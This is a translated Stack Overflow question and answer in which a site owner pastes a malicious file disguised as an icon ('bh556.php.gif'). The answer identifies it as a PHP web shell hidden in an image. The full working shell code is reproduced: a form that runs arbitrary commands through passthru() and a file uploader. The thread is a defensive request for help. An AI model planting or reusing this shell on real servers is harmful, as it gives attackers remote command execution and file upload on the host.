php - 可能的网站黑客尝试

标签 php validation

我刚刚收到房东发来的热情信息,告诉我...... “我们检测到有人试图通过 http 或 ftp 访问您的帐户”

检查恶意文件后,有人上传了一个名为“bh556.php.gif”的图标

打开此文件,它包含以下代码:

<html>
<head>
<div align="left"><font size="1">Input command :</font></div>
<form name="cmd" method="POST" enctype="multipart/form-data">
<input type="text" name="cmd" size="30" class="input"><br>
<pre>
<?php
if ($_POST['cmd']){
$cmd = $_POST['cmd'];
passthru($cmd);
}
?>
</pre>
<hr>
<div align="left"><font size="1">Uploader file :</font></div>

<?php
$uploaded = $_FILES['file']['tmp_name'];
if (file_exists($uploaded)) {
   $pwddir = $_POST['dir'];
   $real = $_FILES['file']['name'];
   $dez = $pwddir."/".$real;
   copy($uploaded, $dez);
   echo "FILE UPLOADED TO $dez";
}
?>     </pre>
<form name="form1" method="post" enctype="multipart/form-data">
 <input type="text" name="dir" size="30" value="<? passthru("pwd"); ?>">
 <input type="submit" name="submit2" value="Upload">
 <input type="file" name="file" size="15">
      </td>
    </tr>
</table>
</body>
</html>

谁能解释一下如何防止再次通过图标上传,并解释一下上面的代码到底做了什么?

最佳答案

这是一个 PHP Webshel​​l,参见 here获取常见列表。它允许恶意用户通过 PHP 文件执行命令,这具有极大的危害性。

通过标题和一些巧妙的技巧将它们隐藏在图像中很常见,请参阅说明 here

我的建议是,删除文件,解决泄漏的原因,这可能是某种描述的注入(inject)攻击。

关于php - 可能的网站黑客尝试,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/28852904/

相关文章:

php - Kohana 3 的验证错误可以继承吗?

rest - 不要使用 JHipster/Spring Boot 验证 REST 层中的某些字段

java - 在 keyup 事件上跳过 Primefaces 输入文本的验证,但在提交时验证

php - 在设计期间测量 MySQL 数据库性能

php - Woocommerce 3 商店页面上“添加到购物车”下的“添加额外”按钮

javascript - Laravel:在允许 HTML 标签时,针对 XSS 清理用户输入

php - 使用 PHP 和 MySQL 存储敏感数据

php - 如果端口打开,则使用 ajax 图像;如果未打开,则使用备用图像

c# - 生产服务器上的 MVC 4 验证属性问题

objective-c - 如何使用 Core Data 验证托管对象存储的 sqlite 文件